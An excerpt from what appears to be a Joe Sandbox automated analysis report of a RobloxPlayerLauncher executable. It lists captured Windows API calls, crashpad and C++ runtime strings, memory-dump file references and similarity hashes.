                • Part of subcall function 009F7461: RaiseException.KERNEL32(E06D7363,00000001,00000003,009E35B6,009E35B6,?,009E20DC,009E35B6,00B45B84,00000000,009E35B6,00000000,015B8558,009E3588,00000006), ref: 009F74C1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ExceptionRaisestd::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 1197455533-1866435925
              • Opcode ID: d4c44972e0335990172ed59809be9313da1abcc6d2b782f87d952967be49817d
              • Instruction ID: 351ca1a8d768e7a8a885197914c718342beae581191fda53428d0e1f698f7e25
              • Opcode Fuzzy Hash: d4c44972e0335990172ed59809be9313da1abcc6d2b782f87d952967be49817d
              • Instruction Fuzzy Hash: 82F0C872D4422C67DB50E998E846BEE739C5B54B00F044455FA059B283EE6E99418BE3
              APIs
              • WriteFile.KERNEL32(?,?,008ADA64,?,00000000), ref: 008AE303
              Strings
              • long __cdecl crashpad::internal::NativeWriteFile(void *,const void *,unsigned int), xrefs: 008AE342
              • ../../../util/file/file_io_win.cc, xrefs: 008AE33D
              • bytes_written != static_cast<DWORD>(-1), xrefs: 008AE321
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FileWrite
              • String ID: ../../../util/file/file_io_win.cc$bytes_written != static_cast<DWORD>(-1)$long __cdecl crashpad::internal::NativeWriteFile(void *,const void *,unsigned int)
              • API String ID: 3934441357-2328876231
              • Opcode ID: 9f3de7a424edc462c897fecef652fd7518a44ce93bac9a235e8267c333f627e3
              • Instruction ID: e9e00a0303cb529198ac65d83b3020737d03e4cf939c2083e3c8089d1e288a9d
              • Opcode Fuzzy Hash: 9f3de7a424edc462c897fecef652fd7518a44ce93bac9a235e8267c333f627e3
              • Instruction Fuzzy Hash: C0012135600209FFDF20DE64ED05EAE7369FB12720F100764B924D32D0EB719F158652
              APIs
              • GetConsoleOutputCP.KERNEL32(2912923C,00000000,00000000,00000000), ref: 00A08BEA
                • Part of subcall function 00A1CF5D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A1CECB,?,00000000,-00000008), ref: 00A1D009
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A08E45
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A08E8D
              • GetLastError.KERNEL32 ref: 00A08F30
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 79543fbc6dc32f27df1ed9ad4ce2dcb4c5819c387240da3592ef039010d77661
              • Instruction ID: e8e774db4611b85e3dcc589a208e9f4dec09ae2576def9028f388afb90ffcb14
              • Opcode Fuzzy Hash: 79543fbc6dc32f27df1ed9ad4ce2dcb4c5819c387240da3592ef039010d77661
              • Instruction Fuzzy Hash: AAD18AB5D002499FCF15CFA8E8809EDBBB5FF49310F18452AE895EB381DB34A942CB54
              APIs
              • GetLastError.KERNEL32(WriteFile), ref: 008ADA85
              Strings
              • bool __cdecl crashpad::LoggingWriteFile(void *,const void *,unsigned int), xrefs: 008ADA97
              • ../../../util/file/file_io.cc, xrefs: 008ADA92
              • WriteFile, xrefs: 008ADA80
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorLast
              • String ID: ../../../util/file/file_io.cc$WriteFile$bool __cdecl crashpad::LoggingWriteFile(void *,const void *,unsigned int)
              • API String ID: 1452528299-3552440782
              • Opcode ID: a9762d00b1cabb5b3daa56d280259be37e593e87c2922a8553c7f00c07735f12
              • Instruction ID: dcc36e5a41fac3ce68e7d283348916040a783b09c38cce5b3696255f99909f03
              • Opcode Fuzzy Hash: a9762d00b1cabb5b3daa56d280259be37e593e87c2922a8553c7f00c07735f12
              • Instruction Fuzzy Hash: BC01A535A44328ABDB14DE68EC02AADB778FB42714F004465FC05E7A81EB70BE55D791
              APIs
              • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 007397FB
              • VerSetConditionMask.KERNEL32(00000000), ref: 007397FF
              • VerSetConditionMask.KERNEL32(00000000), ref: 00739803
              • VerifyVersionInfoW.KERNEL32(?,00000023,00000000), ref: 0073982A
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ConditionMask$InfoVerifyVersion
              • String ID:
              • API String ID: 2793162063-0
              • Opcode ID: 7f9974edc91e67c5b335ff852e2345ef807f74dc64ef17fbcb09929a14065d8e
              • Instruction ID: 5ad1736ca2592f434ef09548c4020ba978a22c7e7ffb907a31de16c4894bf7d7
              • Opcode Fuzzy Hash: 7f9974edc91e67c5b335ff852e2345ef807f74dc64ef17fbcb09929a14065d8e
              • Instruction Fuzzy Hash: E701E1B494431CBAEB24DF64DC46FEA7B7CEB45710F004499BA08A7281D6B45B848FD0
              APIs
              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00A1DC02,00000000,00000001,00000000,00000000,?,00A08F84,00000000,00000000,00000000), ref: 00A26B12
              • GetLastError.KERNEL32(?,00A1DC02,00000000,00000001,00000000,00000000,?,00A08F84,00000000,00000000,00000000,00000000,00000000,?,00A09542,00000000), ref: 00A26B1E
                • Part of subcall function 00A26AE4: CloseHandle.KERNEL32(FFFFFFFE,00A26B2E,?,00A1DC02,00000000,00000001,00000000,00000000,?,00A08F84,00000000,00000000,00000000,00000000,00000000), ref: 00A26AF4
              • ___initconout.LIBCMT ref: 00A26B2E
                • Part of subcall function 00A26AA6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A26AD5,00A1DBEF,00000000,?,00A08F84,00000000,00000000,00000000,00000000), ref: 00A26AB9
              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00A1DC02,00000000,00000001,00000000,00000000,?,00A08F84,00000000,00000000,00000000,00000000), ref: 00A26B43
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: 5c8fa56f659d425ecb0a7bb21ed930f25a2abfbf0f63debc47fb9c0f9a5aabcb
              • Instruction ID: 6ab1de80ea00b0be4c20effff87100f13226eac9d3ed6b270339deecbbe508c2
              • Opcode Fuzzy Hash: 5c8fa56f659d425ecb0a7bb21ed930f25a2abfbf0f63debc47fb9c0f9a5aabcb
              • Instruction Fuzzy Hash: 6BF0AC3A551265BFCF225FD9EC09A9E7F36EB497A1B055020FE1895130C7329D60EB90
              APIs
              • Concurrency::cancel_current_task.LIBCPMT ref: 008CFF97
              • __floor_pentium4.LIBCMT ref: 008CFFDE
              Strings
              • invalid hash bucket count, xrefs: 008CFF88
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task__floor_pentium4
              • String ID: invalid hash bucket count
              • API String ID: 1502093491-1101463472
              • Opcode ID: cba243fe23321a09e3f88d9b5e296b3f20218b93a99d44deef62dd5ec63cef53
              • Instruction ID: c26d6e7736cf2b3fdcfe5174d81fc0d9a04506d1c2c8ea162894db21cc09bb6e
              • Opcode Fuzzy Hash: cba243fe23321a09e3f88d9b5e296b3f20218b93a99d44deef62dd5ec63cef53
              • Instruction Fuzzy Hash: 64C19F75A00219DFDB14DF58C480AA9FBB6FF88300B1486ADE959EB352D730ED81CB90
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 00A17CFD
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorHandling__start
              • String ID: pow
              • API String ID: 3213639722-2276729525
              • Opcode ID: c90fe7bb81a19ad720f0acaff5d418401ceee380aefc8b0b7499ae07bc9b8415
              • Instruction ID: bd2ad5233186a692fa51379eab76f6bbf55b4b59b7ac07ac127ec1446c598ccc
              • Opcode Fuzzy Hash: c90fe7bb81a19ad720f0acaff5d418401ceee380aefc8b0b7499ae07bc9b8415
              • Instruction Fuzzy Hash: 48514471A1C21686CB217B1CFA013BE2BB4EF55750F209968E0D2462E9EF348CD19A86
              APIs
              • Concurrency::cancel_current_task.LIBCPMT ref: 00726DC6
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task
              • String ID: false$true
              • API String ID: 118556049-2658103896
              • Opcode ID: 921c0e0cce044306f8ba2d7de854dbff227f2515986b4932abfdcdd4e39f0697
              • Instruction ID: b45e0cac3acaf81b098312b851e8e38e0996a21986bd70b72afb123ff100ef4a
              • Opcode Fuzzy Hash: 921c0e0cce044306f8ba2d7de854dbff227f2515986b4932abfdcdd4e39f0697
              • Instruction Fuzzy Hash: 2D51B2B1D0035CDADB11DFA4D840BEEBBF8EF04704F10855AE945AB281E774AA84CBE1
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,?,00000000,?,00000000,?,?,0071E3D1), ref: 0072133A
              • GetLastError.KERNEL32(?,0071E3D1), ref: 0072134E
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,0071E3D1), ref: 00721366
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,00000000), ref: 0072138D
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
